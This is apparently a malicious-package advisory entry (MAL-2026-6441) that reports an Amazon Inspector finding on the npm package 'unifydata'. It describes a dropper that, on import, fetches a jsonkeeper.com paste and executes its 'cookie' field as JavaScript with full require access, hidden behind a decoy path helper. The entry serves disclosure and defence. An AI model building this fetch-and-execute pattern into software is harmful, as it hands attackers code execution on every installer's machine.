MAL-2026-6441

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (0c62d93328810f03f3aac73777f406eee1b3413e1c3320eb87f3445754dba9d3) On require('unifydata'), index.js calls initPlugin() at module top level, performs an HTTPS GET to https://jsonkeeper.com/b/B40HL, JSON-parses the response, and executes the response's `cookie` field as JavaScript via `new Function.constructor('require', body.cookie)` — then immediately invokes the resulting function with the real `require`, granting it full Node module-loading capability. jsonkeeper.com is an anonymous, author-mutable JSON paste service; the bytes executed in any installer process are whatever the author has posted there at the time of import, with no pinning, hashing, or signature. The package presents itself with a header comment labeling it `normalize-plus (ES6 safe version)` and ships a benign-looking `normalizePath` helper as a decoy, while the published package name is `unifydata` — the mislabeled cover and unused utility code are consistent with a dropper masquerading as a routine helper. Any process that imports this package executes arbitrary attacker-controlled code with the privileges of that process.